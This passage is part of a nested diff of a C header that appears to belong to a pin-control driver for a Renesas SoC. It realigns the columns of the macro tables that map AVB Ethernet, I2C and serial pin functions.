+-#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR7 */
+-/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR8 */
+-/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
